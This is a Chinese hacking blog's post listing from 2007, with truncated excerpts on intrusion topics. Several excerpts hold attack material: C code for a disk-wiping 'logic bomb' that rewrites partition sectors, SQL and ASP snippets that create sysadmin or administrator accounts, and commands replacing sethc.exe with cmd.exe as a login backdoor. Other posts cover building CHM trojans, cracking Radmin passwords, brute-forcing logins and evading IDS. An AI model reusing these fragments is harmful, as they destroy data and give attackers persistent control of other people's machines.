- 博客(54)
- 资源 (3)
- 收藏
- 关注
原创 新型注入方式直击网络——session注入探究
首先说明,本文不是讲session欺骗方法或原理。 1年前流转跟我说他有一个想法,就是session注入,当时我认为有点不可能,因为session很少进库的,就算进库了,也注射不了,就算能注射,也不能回显,对access没什么用处。后来看“寂寞的刺猬”大哥写的一篇漏洞分析文章的时候无意中发现他截取的代码里
2007-09-29 21:32:00 1034
原创 黑客通过IP欺骗进行攻击的原理及预防
本文的目的在于向读者解释IP 欺骗的实现方法和预防措施。它要求您掌握有关Uni x 和TCP/IP 的少量知识。如果您没有,也没有关系,相信下面的说明能给您以足够的背景知识。 IP欺骗是适用于TCP/IP环境的一种复杂的技术攻击,它由若干部分组成。目前,在In ternet领域中,它成为黑客攻击时采用的一种重要手段,因此有必要充分了解它的工作原理和防范措施,以充分保护自己的合法权益。
2007-09-29 17:41:00 3665
原创 关于ssh端口转发的深入实例
ssh的三个强大的端口转发命令:QUOTE:ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Hostssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Hostssh -C -f -N -g -D listen_port user@Tunnel_H
2007-09-29 11:27:00 864
原创 利用ICS服务共享Internet连接
Windows 2000提供的ICS服务为家庭网络或小型办公网络接入Internet提供了一个方便经济的解决方案。ICS允许网络中有一台电脑通过接入设备接入Internet,要求这台电脑是基于Windows 2000的系统,通过启用这台电脑上的ICS服务,网络中的其他电脑就可以共享这个连接来访问Internet的资源。 为了方便起见,我们将设置了ICS服务的电脑称为ICS电脑,网
2007-09-29 11:07:00 1472
原创 Netsh命令详解
当前笔记本的可移动性增强,我们需要在多个环境下接入网络开始工作,在没有路由器自动分配的情况下,就需要每次手动设置IP地址和网关等信息,相当烦琐,通过实践利用netsh命令用快捷方式实现了IP地址的快速切换。A. 基本用法 1,新建记事本,写入如下信息:(横线中间内容)int ipset address name="本地连接" source=static addr=192.168.0.10
2007-09-29 11:03:00 2135
原创 CGI漏洞速查三
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。解决方法:建议升级该cgi程序,或者删除该文件。 28. whois.cgi 描述:在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包 括: Whois Internic Lookup - version: 1.02 CC Whois - Version: 1.0 Matt?s Whois -
2007-09-28 16:24:00 1346
原创 CGI漏洞速查二
php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任 何系统文件可以被入侵者读取的漏洞 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。解决方法: 删除php.cgi程序是最好的办法。 12.handler 描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存 溢出错误,允许入侵者在server上远程执行一段程序
2007-09-28 16:23:00 1867
原创 CGI漏洞速查一
1.wguset.exe 描述: 如果您使用NT做为您的WebServer的操作系统,而且 “wguest.exe”存在于您的Web可执行目录中的话,入侵者将能利用 它阅读到您的硬盘上所有USR_用户能阅读的文件。 建议: 将wguset.exe从你的We
2007-09-28 16:22:00 1248
原创 命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:/test.qry文件,内容如下:exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember test, sysadmin然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:/test.qry
2007-09-28 16:14:00 1291
转载 教你拿到Win XP系统的超级管理员权限
教你拿到Win XP系统的超级管理员权限Windows XP凭借极高的安全性和稳定性,赢得了广大用户的青睐。我们可以通过建立个人账户、设定密码来保护自己的个人隐私,还可以用Administrators(超级管理员)的身份任意设置账户,为每一个账户设置不同的权限,可以说拥有至高无上的权利,也拥有系统的“生杀大权”,享有系统最高级别的安全保障。 但是,如果我告诉你,我能不费吹灰之力就可以将你这个Ad
2007-09-28 16:11:00 1387
原创 初窥WMI
Microsoft Windows Management Instrumentation (WMI)。中文名字叫Windows管理规范。从Windows 2000开始,WMI(Windows 管理规范)就内置于操作系统中,并且成为了Windows系统管理的重要组成部分。所以大家很容易就能见到它的,因为我们至少也应该是个Windows 2000的使用者了。下面我将详细介绍它的每个细节,让你从不
2007-09-27 20:12:00 728
原创 推荐:NT操作系统的Rootkit技术初探
Rootkit最早是起源于UNIX,出现在20世纪90年代初,在1994年2月的一篇安全咨询报告中首先使用了Rootkit这个名称。这篇安全咨询就是CERT-CC的CA-1994-01,题目是Ongoing Network Monitoring Attacks,最新的修订时间是1997年9月19日。从出现之后,Rootkit的发展非常迅速,应用越来越广泛,检测难度也越来越大,而且使用者由计算机
2007-09-27 19:55:00 660
原创 webadmin原创的自述 虽然很老 可是技术不老
大家好,不知道各位有没有用过偶的WebAdmin 2.X?嗯,对啦,就是那个ASP.Net环境下的后门。那是我不成熟的作品,要是有什么不顺手的地方还希望多多包涵。呵呵,今天呢,还是让偶来“黄婆卖瓜自卖自夸”吧,给大家介绍一下WebAdmin的最新版本——WebAdmin 2.Y。 WebAdmin 2.Y功能上与2.X大致一样,不过2.Y是C/S版本。呵呵,C/S是大势所趋嘛。C/S的好处就是
2007-09-26 21:41:00 798
原创 又一篇 TCP/IP的漏洞 WINDOWS密码泄密
Windows访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。 下面是SMB的密码认证方式。 WINDOWS的139口的访问过程,箭头表示数据方向: 1.客户端服务端 2.客户端-------客户端类型、支持的服务方式列表等---------->服务端 3.客户端加密用的key等-----------服务端
2007-09-26 21:33:00 937
原创 IIS下另外一个危险的ISAPI扩展
我们先来看一份关于SSI的介绍:SSI有什么用? 之所以要扯到ssi,是因为shtml--server-parsed HTML 的首字母缩略词。包含有嵌入式服务器方包含命令的 HTML 文本。在被传送给浏览器之前,服务器会对 SHTML 文档进行完全地读取、分析以及修改。 shtml和asp 有一些相似,以shtml命名的文件里,使用了ssi的一些指令,就像asp中的指令,你可以在
2007-09-25 19:12:00 552
转载 135批量抓鸡 依赖 古老得RTCS
关于135抓肉鸡的分析最近好象135搞的很火热 看见有人也把那个批量抓135肉鸡的工具发出来了我也就说下把反正俺也不早就不用那鸟东西了 上次看了那个也说一天抓1000只肉鸡 由于我是开快进看的 没仔细的看 我以为他是自动登陆telnet 所以我就晕死了 应为自动登陆telnet我以前研究很多 我由于我批处理我学的不怎么样也就会点皮毛就加了他 结果他一上来就开口批量开23卖2000RMB
2007-09-25 19:09:00 3573
原创 135 137 139 445
在许多“网管”眼里,135端口是最让人捉摸不透的端口,因为他们中的大多数都无法明确地了解到135端口的真正作用,也不清楚该端口到底会有哪些潜在的危险。直到一种名为“IEen”的专业远程控制工具出现,人们才清楚135端口究竟会有什么样的潜在安全威胁。 IEen工具能够借助135端口轻松连接到Internet上的其他工作站,并远程控制该工作站的IE浏览器。例如,在浏览器中执行的任何操作,包括浏览页面内
2007-09-25 19:01:00 1467
原创 windowsSP2 下 用 FINDPASS 截取密码
命令行下卸载Windows2003 SP1/SP2%systemroot%/$NtServicePackUninstall$/spuninst/spuninst/U按无人参与模式删除 service pack。如果使用此选项,那么在卸载 SP1 的过程中,只有出现致命错误才会显示提示。/Q按安静模式删除 SP1,此模式与无人参与模式相同,只是隐藏了用户界面。如果使用此选项,那么在卸载 SP1 的过
2007-09-23 12:27:00 2559
原创 3个值得借鉴得 VBS
1是下载者得VBS 大家都熟悉把 就不写了2.列举进程 @echo for each ps in getobject _ >ps.vbs @echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs @echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.e
2007-09-21 21:50:00 613
转载 CHM电子书木马制作全攻略
说起CHM格式的电子书,可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中,杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗?今天笔者就以实例形式和大家一道分析一下。 Step1:要想制作一个完美的CHM木马,当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop。
2007-09-21 21:48:00 1384
原创 系统判断代码
404window.status="";if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)window.location.href="tk.htm";elsewindow.location.href="upx06014.htm"; 十二:判断是否有ms06014代码on error resume nextset server
2007-09-21 21:46:00 594
原创 会话劫持攻击实战详解
前言 通常,大家所说的入侵,都是针对一台主机,在获得管理员权限后,就很是得意;其实,真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多,但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是,不管使用什么技术,无非都是抓取目标的数据包,然后分析出敏感数据。如果目标内部采用的是共享式网络(采用HUB集线器连网),那只需要把网卡设置为“混杂模式”,挂上嗅探器(Sniffer),就能简听到你
2007-09-21 21:43:00 1860
原创 卡巴就是卡巴 真 NX啊
6条评论卡巴的 有两条是这么写的 4、卡巴斯基的引擎技术是国内外许多杀毒软件的核心,这是公认的事实,另外,国外的我不知道,国内的杀毒厂商,对上报病毒一律先卡巴扫一遍,这是很有趣的现象,你说,卡巴斯基是不是其他杀软的师傅。 6、最重要的一点是,卡巴斯基对上报病毒的用户并没有物质奖励,但大家却趋之若鹜,原因在于:当我1小时前中了未知病毒,于是将病毒体文件发送给卡巴,然后悠悠然去洗澡吃饭,过1
2007-09-20 16:52:00 526
原创 网上流传的 逻辑炸弹 源码 供大家研究
# include # include # define N 0x200 main() { int i; unsigned char s[N]; biosdisk(2,0x80,0,0,1,1,s); biosdisk(3,0x80,0,0,3,1,s); for(i=0x1be;is[i]=0; s[0x1c0]=1; s[0x1c2]=5; s[0x1c3]=1; s[0x1c4]=1; bi
2007-09-20 16:45:00 1532
原创 xmlhttp GET方式暴力破解
body { font-size: 10pt; background-color:#D4D0C8 }td { font-size: 9pt }/*程序标题:javascript字典探测用户名工具发布时间:2006年8月文章作者:翟振凯 (小琦)作者网站:http://www.xiaoqi.net 作者论坛:http://www.tdqy.com演示
2007-09-20 15:48:00 1109
原创 详解XMLHTTP控件的应用[转自千寂孤城博客]
最近在我的脚本群里总有一些朋友问我XMLHTTP对象到底是什么,有什么用。本文我就详细地介绍一下Microsoft.XMLHTTP对象的使用,希望对大家能有所帮助。 首先,Microsoft.XMLHTTP是一个控件,而且是系统默认自带的控件(Windows 98以下除外),它通过http协议访问网络。在我的理解中,XMLHTTP控件就相当于一个浏览器:向网站发送http请求(POST或GET),
2007-09-18 20:19:00 1510 1
转载 MSSQL注入PUBLIC权限下的xp_dirtree再度利用
本来这文章在TEAM里面放了好久的了!只 是>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先 发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...正文:提 起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是 系统权限》的文章(名
2007-09-18 13:54:00 1473
原创 函数堆栈变化原理
#i ncludelong test(int a,int b){ a = a + 1; b = b + 100; return a + b;}void main(){ printf("%d",test(1,3));}写成32位汇编就是这样;////////////////////////////////////////////////////////////////////
2007-09-18 13:34:00 896
原创 塞格申左轮还原破解
网吧左轮软件 现在有许多网吧都在用它管理,方便 使用 属于本地还原 服务器更新游戏类型的 还可以屏蔽关键字等功能 ~本地还原大多是配合冰点还原高版本的~启动方式很简单了 就是普通自启动,我们就从启动入手,也许你无法用一些系统自带的工具查询了,因为一般这些都被关键字屏蔽了,所以我用的是精锐网吧辅助工具5。7,大家可以去BAIDU搜索,很多的,然后打开工具 找到启动项,看到左轮启动的方式
2007-09-18 13:34:00 1724 1
原创 初步入侵 9YOU.COM 手记
漏洞是好长时间以前的了 在玩劲乐的时候无意中发现的 当时没时间搞 今天才拿出来耍耍 找到了那个漏洞页面, 花了好长时间构造了语句,终于成功注入,当时好兴奋啊,还跟我哥们 小泉 显了显,可是越发现不对劲,这个注入点权限好低啊,无法提升权限,搞了半天发现只能搞到 劲乐团的游戏帐号, 可是我要这帐号有什么用啊 PS:劲舞的偶还可以考虑考虑^_^。 郁闷啊,没办法,随便晃悠晃悠就走了 呵呵 想
2007-09-18 13:33:00 667
原创 用ASP代码添加超级用户——asp提权时用
.network对象脚本权限提升漏洞利用工具用户:密码:%@codepage=936%>if request.servervariables("REMOTE_ADDR")response.write "iP !s n0T RiGHt"elseif request("username")username=request("username")passwd=request("passwd")Res
2007-09-18 13:31:00 548
原创 Radmin密码破解的新招
Radmin 是一款很不错的服务器管理无论是 远程桌面控制 还是 文件传输速度都很快 很方便这样也形成了 很多服务器都装了 radmin这样的现在你说 4899默认端口 没密码的 服务器你上哪找?大家都知道radmin的密码都是32位md5hack.77169.com/List/List_46.html" target="_blank">加密后存放在注册表里的具体的表键值为 那在攻陷一台w
2007-09-16 11:11:00 8821
原创 一个比较另类的WINDOWS后门
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。XP:将安装源光盘弹出(或将硬盘上的安装目录改名)cd %widnir%/system32/dllcacheren sethc.exe *.ex~cd %widnir%/
2007-09-15 13:24:00 692
原创 绕IDS
入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行为以及报告攻击的。如果把防火墙比作守卫网络大门的门卫的话,那么入侵检测系统(IDS)就是可以主动寻找罪犯的巡警。 因而寻求突破IDS的技术对漏洞扫描、脚本注入、URL攻击等有着非凡的意义,同时也是为了使IDS进一步趋向完善。 Snort是很多人都在用的一个IDS了,其实它也并不是万能的,笔者下面就来谈谈突破诸如Snort这类基
2007-09-13 20:41:00 741
原创 沙软测试字段
X5O!P%@AP[4/PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2007-09-13 20:18:00 409
原创 MD5的一些查询网站
http://www.xmd5.org/ http://www.milw0rm.com/md5/info.php (2)http://www.neeao.com/md5/ http://md5.mmkey.com/ http://gdataonline.com/seekhash.php http://www.plain-text.info/search.php http://passcrack
2007-09-13 20:17:00 759
原创 批处理及DOS的一些重要命令 很容易忽略
1 echo 和 @回显命令@ #关闭单行回显echo off #从下一行开始关闭回显@echo off #从本行开始关闭回显。一般批处理第一行都是这个echo on #从下一行开始打开回显echo #显示当前是 echo of
2007-09-13 20:12:00 888
原创 SAM文件剖析
关于SAM 不要误解了SAM,这不是一个文件sam这么简单。SAM(Security Accounts Manager安全帐户管理器)负责 SAM数据库的控制和维护。SAM数据库位于注册表HKLM/SAM/SAM下,受到ACL保护,可以使用regedt32.exe打开注 册表编辑器并设置适当权限查看SAM中的内容。SAM数据库在磁盘上就保存在%systemroot%system32/config/
2007-09-13 20:10:00 3651
原创 ADSUTIL.VBS提权
asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下 ========================================
2007-09-13 20:09:00 1265
转载 Php5 GPC绕过缺陷
Php5 GPC绕过缺陷 --------------------------------------------------------------------------------作者:T_Torchidy 来源: 类别:漏洞分析资料 日期:2006-08-13 今日/总浏览: 1/1027 在讨论具体的缺陷之前我们先来了解一点php安全方面的小东西。magic_quotes_gp
2007-09-13 20:07:00 799
dos 汇编学习笔记(记录了很多小的细节和应该注意的东西)
2009-06-20
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人